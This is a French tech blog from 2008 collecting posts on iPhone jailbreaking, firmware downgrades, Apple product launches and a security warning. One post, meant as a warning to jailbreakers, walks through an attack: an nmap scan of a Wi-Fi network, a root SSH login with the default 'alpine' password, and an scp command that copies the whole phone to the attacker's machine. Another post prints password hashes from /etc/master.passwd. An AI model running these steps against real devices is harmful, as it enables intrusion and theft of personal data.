Software Developement Kit reporté à Mars par Apple

desimlocked and jailbreaked iphone with 1.1.3On attend tous la sortie du firmware 1.1.4 qui devrait voir l’apparition d’applications tierces « officielles » et surtout la mise en ligne du SDK (Software Development kit) qui devrait permettre le développement d’applications plus propres.

Initialement prévu pour février, il va falloir, d’après une news d’Apple insider, attendre jusqu’en mars prochain pour pouvoir découvrir le jouet.

Make my iPhone sexy : main script execution error avec le firmware 1.1.3

Un scan nmap et c’est le drame

Previously in prison … euh Jailbreak : pas le droit de toucher à passwd sous peine de bricker votre iPhone.
Pour palier la lacune de passwd, j’ai voulu éditer le /etc/master.passwd … manque de bol, impossible d’installer le bsd subsystems tools. Une vieille histoire de permissions foireuses, pas très grave mais blocante pour la suite des opérations : du coup pas de vi, pas de ls, pas de cat, pas de chown …. fâcheux pour les permissions… bref un truc inutilisable. Voici ce qui a fonctionné pour moi :

-sh-3.2# cd /Applications
-sh-3.2# chmod +s Installer.app/Installer

Je redémarre complètement l’iPhone

Je retente l’installation du bsd subsystem tool et hop tout passe comme une lettre à la poste : nous y voici, je peux maintenant éditer à coup de vi mes pass encodés.

-sh-3.2# cat /etc/master.passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by lookupd. By default,
# lookupd gets information from NetInfo, so this file will not be consulted
# unless you have changed lookupd's configuration.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false

Ne le faites pas … c’est un splendide moyen de le bricker.

iPhone Hacks : Jailbreakez votre iPhone en 1.1.3 et offrez vos données personnelles aux script kiddies

Un scan nmap et c’est le drameEn m’amusant un peu avec l’iPhone et l’iPod Touch, j’avais constaté certains courants d’air. A plusieurs reprise sur ce blog ou sur Toonux.org, j’ai succinctement abordé les problèmes de sécurité inhérents à la mobilité, certes, mais là… il faut bien avouer qu’avec un iPhone Jailbreaké, on dipsose d’une splendide passoire numérique.

L’objectif de ce blog n’est vraiment pas dispenser des cours magistraux de sécurité et je n’en ai d’ailleurs pas le niveau. Oui mais voilà, ce que j’ai vu de l’iPhone me choque. Le problème dépasse de loin les flow de Safari qui permettent l’installation de l’installer.app.

Avec les firmwares 1.1.1 et 1.1.2, il était relativement aisé de protéger un minimum vos données personnelles (en clair les 8, 16 ou 32go de données que votre iPhone peut accueillir : mp3 … ouai bof, mais surtout carnet d’adresse, mails … passwords …

Ces terminaux disposent d’un système d’exploitation basé sur un Unix « terreux », pas tout à fait sale mais super loin d’être propre. En standard nous avons donc 2 comptes :

  • Un compte root avec lequel on peut faire la pluie et le beau temps
  • Un compte mobile beaucoup plus limité.
  • Très vite après l’installation de l’installer, je vois apparaître un message qui m’horrifie… on ne peut pas utiliser la commande passwd pour changer le password root de l’iPhone sous peine de voir Springboard redémarrer toutes les 5 secondes ! Comprenez que j’ai sshd activé sur mon terminal et que je ne peux pas changer le password root! J’ai beau ne pas être parano, tout ceci me dérange particulièrement. Pourquoi ? tout simplement parce qu’il suffit que je me connecte sur un réseau wifi pour offrir TOUT ce qui est contenu dans mon téléphone à un petit malin ! Pour la faire simple voilà comment un script kiddy peut peut procéder pour me rooter :
  • mon iphone est connecté sur le même réseau wifi qu’un emmerdeur que nous allons appeler Jean-Kevin
  • Jean-kevin est un petit malin qui connaît nmap
  • pour se connecter il va avoir besoin de mon adresse ip
  • un petit ifconfig va lui donner une indication sur la plage ip du routeur dont le serveur dhcp attribue aussi l’ip de mon iphone, si l’ip de ce routeur ressemble à ça 192.168.0.1 il va pouvoir scanner simplement toutes les machines du réseau à la recherche d’une victime

Il lancera par exemple cette commande :

Quicksilver:~ Jean-Kevin$ sudo nmap -sS -v -O 192.168.0.1/24

ce qui lui retournera au moment ou le scanne passera sur l’ip de mon iPhone ceci :

Starting Nmap 4.20 ( http://insecure.org ) at 2008-02-16 23:40 CET
Initiating ARP Ping Scan at 23:40
Scanning 192.168.0.46 [1 port]
Completed ARP Ping Scan at 23:40, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:40
Completed Parallel DNS resolution of 1 host. at 23:40, 0.03s elapsed
Initiating SYN Stealth Scan at 23:40
Scanning 192.168.0.46 [1697 ports]
Discovered open port 22/tcp on 192.168.0.46
Increasing send delay for 192.168.0.46 from 0 to 5 due to 173 out of 575 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 5 to 10 due to 52 out of 172 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 10 to 20 due to max_successful_tryno increase to 4
Completed SYN Stealth Scan at 23:40, 24.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 192.168.0.46
Retrying OS detection (try #2) against 192.168.0.46
Retrying OS detection (try #3) against 192.168.0.46
Retrying OS detection (try #4) against 192.168.0.46
Retrying OS detection (try #5) against 192.168.0.46
Host 192.168.0.46 appears to be up ... good.
Interesting ports on 192.168.0.46:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
692/tcp filtered unknown
MAC Address: 00:1E:C2:C6:F4:C2 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=2/16%OT=22%CT=1%CU=40160%PV=Y%DS=1%G=Y%M=001EC2%TM=47B7666
OS:9%P=i386-apple-darwin9.1.0)SEQ(SP=0%GCD=1%ISR=1B%TI=I%II=I%SS=S%TS=1)SEQ
OS:(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)SEQ(SP=0%GCD=1%ISR=1B%TI=I%TS=1)S
OS:EQ(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)OPS(O1=M5B4NW0NNT11SLL%O2=M5B4N
OS:W0NNT11SLL%O3=M5B4NW0NNT11%O4=M5B4NW0NNT11SLL%O5=M5B4NW0NNT11SLL%O6=M5B4
OS:NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=
OS:Y%T=40%W=FFFF%O=M5B4NW0SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S
OS:%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=0%RUL=G%RUD=G)IE(R=Y%DFI=S%T=40%TOSI=S%CD=S%SI=S%DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 37.377 seconds
Raw packets sent: 3325 (150.770KB) | Rcvd: 1824 (75.380KB)

… on voit donc ici très clairement qu’un appareil au fingerprint un peu space dont la mac adress trahira vite la nature : sur le réseau wifi se trouve un iPhone dont l’ip est 192.168.0.46 qui dispose du port ssh ouvert !

ce qui nous donne dans la tête de notre Jean-Kevin :

iPhone+ssh open+firmware 1.1.3 sur lequel je ne peux pas changer le pass root qui est « alpine » = une splendide opportunité de briller en société en se faisant passer pour un super hacker. Il ne lui reste plus qu’à porter le coup de grâce :

en lançant l’inévitable :


ssh [email protected]

entrer le password « alpine » au prompt

et hop, le voici connecté en root à mon iphone.

Mais comme Jean-Kevin en plus d’être un branleur est aussi un super lamer, il va vous voler vos données avec un :

Quicksilver:~ Jean-Kevin$scp -r /* [email protected]:/home/mesfilesdeh@X0r

… et voilà que Jean-Kevin vient de copier tout le contenu de votre iPhone sur sa machine !

Encore une fois, vous voilà prévenus, un iPhone Jailbreaké avec un firmware 1.1.3 vous empêchant de modifier votre password root est une véritable catastrophe niveau sécurité, évitez donc de vous connecter à n’importe quel réseau wifi, particulièrement dans les lieux publics. Si vous ne savez pas ce que vous faites .. ne le faites pas. Ne perdez pas de vue que quel que soit la version de votre firmware, ne pas changer votre password root ou celui du compte mobile vous expose à cette vulnérabilité dont certain diront qu’il s’agit d’une fonctionnalité 😉

Jailbreak et désimlockage d’un iPhone en 1.1.3 avec Independence 1.4 beta

Independence 1.4 : jailbreak & desimlockage d’iPhone firmware 1.1.3

On m’a offert ce matin un iPhone US !
J’y découvre une carte sim AT&T 3G … je ne savais même pas que l’iPhone faisait de la 3G.

Je suis chez Bouygues, j’ai besoin d’un terminal … donc pas le choix, fallait lui faire sa fête. Ca m’aura pris moins d’une heure, lecture de doc comprise grâce à la nouvelle béta d’Independence.

Cette application pour osx open source est vraiment top, elle sait tout faire : activation / désimlockage / installation de ssh / jailbreak …

Attention cette version de indépendence est une béta, elle comporte quelques bugs mais rien d’insurmontable, toutefois il est vivement recommandé d’avoir quelques notions (comme l’utilisation de ssh/scp) avant de vous lancer dans l’aventure.

Je ne répondrai pas ou ne validerai pas les commentaires attestant de la non lecture de cette page là. Vous êtes prévenus, le codeur d’Independence a fait du super boulot, la moindre des choses est donc de le lire, merci d’avance.

SUN rachète MySQL

sunLa news vient de tomber, le géant SUN rachète MySQL pour 1 milliard de dollars, leader mondial incontesté sur les bases de données relationnelles, et s’offre l’un des symboles de l’Open Source. C’est là une confirmation de la politique de SUN qui affiche des ambitions assez gloutonnes, nous attendons avec impatience le salon Solutions Linux 2008 où nous devrions avoir un peu plus d’informations.

Nous n’avons pas plus d’information pour l’instant que ce long post sur le blog de MySQL.

iPod Touch et iPhone : Jailbreak cassé avec le firmware 1.1.3, une méthode pour repasser en 1.1.2

Bon voilà, j’ai pas résisté, j’ai essayé, j’ai vu … et je l’ai eu dans le c***.

On respire un grand coup, on se relaxe, et on repasse en 1.1.2… oui mais voilà il va falloir tout refaire from scratch. Et pour ça il va falloir récupérer les firmware de restauration 1.1.2 et 1.1.1

Attention, vous perdrez toutes vos données et vous assumez le fait que vous êtes entièrement responsable de ce que vous faites, vous ne viendrez pas pleurer parce que vous avez perdu vos données ou pire, endommagé votre appareil.

Un lecture préalable complète est requise de ce mini tuto et de ce mini tuto (merci de cliquer sur les liens indiqués dans les tutos avent de poser des questions).

Annoncé à la keynote de Steve Jobs hier, on sait maintenant que les applications de l’iPhone que sont mail, note, GoogleMap, la météo et la bourse sont disponibles moyennant une mise à jour payante. Personnellement ça me fait ni chaud ni froid et j’ai pas attendu cette mise à jour pour pouvoir en bénéficier. Je vous avais expliqué comment dans ce post et vous trouverez les applis en question dans ce post.
C’est donc reparti pour un tour, vous allez voir qu’en ce qui concerne l’iPod, la méthode est exactement la même que pour passer du 1.1.1 au 1.1.2 mais que pour l’instant, vous n’aurez pas le loisir d’avoir votre appareil jailbreaké en 1.1.3, Apple a semble t-il mis le paquet (en clair ca veut dire que ça prendra peut être quelques heures de plus aux hackers qui nous permettront dans les jours qui viennent de rendre ceci possible). Attention, n’ayant pas d’iPhone sous la main je n’ai pu tester ça que sur un iPod Touch, attention donc pour la partie desimlockage et Independence !

1° Je ne sais pas pour vous, mais personnellement, je n’ai pas mis à jour iTune… juste comme ça par méfiance, vous me direz donc si ça fonctionne avec la dernière mise à jour.

2° On récupère le firware 1.1.1 : c’est ici… mais aussi le 1.1.2 et celui la vous le trouverez . il va évidemment falloir downgrader.

3° Votre appareil est branché à votre ordinateur et vous avez iTune fermé. On reboot maintenant notre iPod ou notre iPhone en pressant le bouton power en haut à gauche de l’appareil et le bouton home, au bout d’une dizaine de secondes on relâche le bouton power du haut mais on maintient la pression sur le bouton home. Hop vous allez avoir iTune qui démarre et vous allez découvrir que vous êtes en recovery mode … c’est bien ce que l’on voulait (cliquez sur l’image ci dessous pour agrandir)

image-3.png

4° Attention à ce stade : sur un mac cliquez sur restaurer en maintenant la touche ALT enfoncée (sous windaube ça doit être shift), vous allez pouvoir sélectionner le firmware 1.1.1 en local sur votre machine.(cliquez sur l’image ci dessous pour agrandir). C’est super long … ne tripotez pas votre iPod, laissez le vivre sa vie jusqu’à la fin du downgrade.

image-4.png

5°On passe donc au premier jailbreak pour le 1.1.1 : on reboot notre iPod en mode normal, on se connecte et on va sur http://jailbreakme.com exécuter le flow qui exploite le trou de sécurité sur le format tif qui nous permet d’installer l’installer.app.

6° on prépare notre appareil pour le jailbreak 1.1.2 avec oktoprep que vous trouverez dans les applications installables en lançant l’installer.app dans la rubrique tweaks pour 1.1.1

7° Notre iPod est maintenant ready pour le 1.1.2, on va donc faire exactement la même chose que dans le 4° mais en sélectionnant cette fois le firmware 1.1.2 que nous avons préalablement téléchargé.

Ok nous y sommes et maintenant pour installer les applications de l’iPhone, je vous laisse vous référer à cette explication ou à la méthode semble t-il plus simple suggérée dans le commentaire de ce post par thibault par ici.

Firmware 1.1.3 pour iPod Touch et iPhone en déploiement

113-firmware.pngnouveau-firm-ipod.pngLa journée a été plutôt chargée chez Apple, après l’annonce par Steve Jobs du nouveau ultra portable signé Apple, le Macbook Air, voici qu’un nouvelle version du firmware de l’iPod Touch et de l’iPhone est maintenant disponible, voilà que nous pouvons maintenant acheter via l’iTune Store et qu’il corrige « des bugs » … oui enfin moi le seul bug que je lui voyais à mon ipod (en dehors de celui d’avoir besoin de iTune et d’être pas franchement un modèle d’ouverture open source) c’est de pas avoir de micro pour faire fonctionner mon client SIP.

Attention comme pour le firmware 1.1.2, le firmware 1.1.3 corrige le flow dans Safari qui permet le jailbreak de votre appareil, il faudra donc, encore une fois le downgrader en 1.1.1 pour pouvoir jailbreaker le firmware 1.1.3… on va également prendre soin d’aller voir ce qui se passe du côté de OktoPrep avant d’upgrader de 1.1.2 à 1.1.3.
———————

iPhone/iPod touch v1.1.3
Références CVE : CVE-2008-0035
Disponible pour : iPhone v1.0 à v1.1.2, iPod touch v1.1 à 1.1.2
Conséquences : l’accès à un site Web malveillant peut entraîner la fermeture d’une application ou l’exécution de code arbitraire
Description : il existe un problème de corruption de la mémoire au niveau de la gestion par Safari des URL. En poussant un utilisateur à accéder à une URL construite de manière malveillante, un attaquant peut provoquer un blocage inattendu de l’application ou l’exécution de code arbitraire. Cette mise à jour résout le problème en réalisant des validations supplémentaires sur les URL.

———————-

Le verrouillage par code se prend lui aussi son petit patch et Safari qui est décidemment un vraie passoire (si si je vous assure, j’ai pu voir aujourd’hui comment il réagissait avec JQuery sur une page avec un script AdSense) se prend lui aussi un correctif sur une vulnérabilité de cross site scripting.

Enfin, si vous souhaitez conserver votre iPod Touch Jailbreaké fonctionnel : n’UPGRADEZ SURTOUT PAS POUR L’INSTANT !

Apple Keynote 2008 : le Macbook Air ou le laptop le plus fin du monde

apple-macbook-air.jpgIl n’y avait pas que du vent dans toutes ces rumeurs sur le Macbook, Steve Jobs vient de le présenter à l’Apple Keynote : mais avec un processeur moins speed contrairement à ce qu’annonçait la rumeur avec les 2,8ghz. Ecran et clavier confortable et surtout un touchpad assez innovant qui n’est pas sans rappeler la maléabilité de l’iPhon. Apple a demandé à Intel pour l’occasion de réduire la taille des processeurs de 60% ! Sachez simplement qu’il tient dans une enveloppe !

On sait également maintenant que le Macbook air sera bien équipé en standard d’un disque de 1.8″ mécanique mais qu’une option vous permettra d’opter pour un 64go plus petit mais bien plus rapide au format SSD (flash).

Voici les spécifications de la bête :

  • 1.6 GHz Standard, 1.8 GHz Option — Intel Core 2 Duo
  • 2go de RAM en standard
  • Ecran de 13.3″ LED
  • 1,36 kg
  • 80 GB hard disk standard, 64 GB SSD as an option. « they’re pricy, but they’re fast » (c’est cher mais rapide !)
    1.8″ Hard Drive
  • 802.11n + Bluetooth 2.1/EDR
  • 5 Watt MagSafe, 1 USB 2.0 port, Micro-DVI, Audio Out
  • Pas de disque optique mais un disque exerne vendu pour 99$
  • Une batterie assurant 5 heures d’autonomie
  • $1799
  • Un nouveau touchpad avec de nouvelles fonctionnalités
  • Un nouvel assistant de migration sans fil vous permettra de migrer votre système et toutes vos données.

Les premières livraisons commenceront dans 2 semaines mais vous pouvez les pré-commander dés aujourd’hui

Pour le plaisir des yeux

[wp_youtube]gHjXM5FefNk[/wp_youtube]

Apple Keynote 2008 : Time Capsule les backups en wifi

C’est parti depuis quelques minutes et voici déjà l’annonce d’un nouveau produit : Time Capsule
Avec Leopard, il est relativement peu aisé de faire des sauvegardes, Apple apporte une solution : une borne Airport Extreme avec un disque dur intégré pour les backups. Deux versions sont disponibles : 500 GB à $299, 1 TB à $499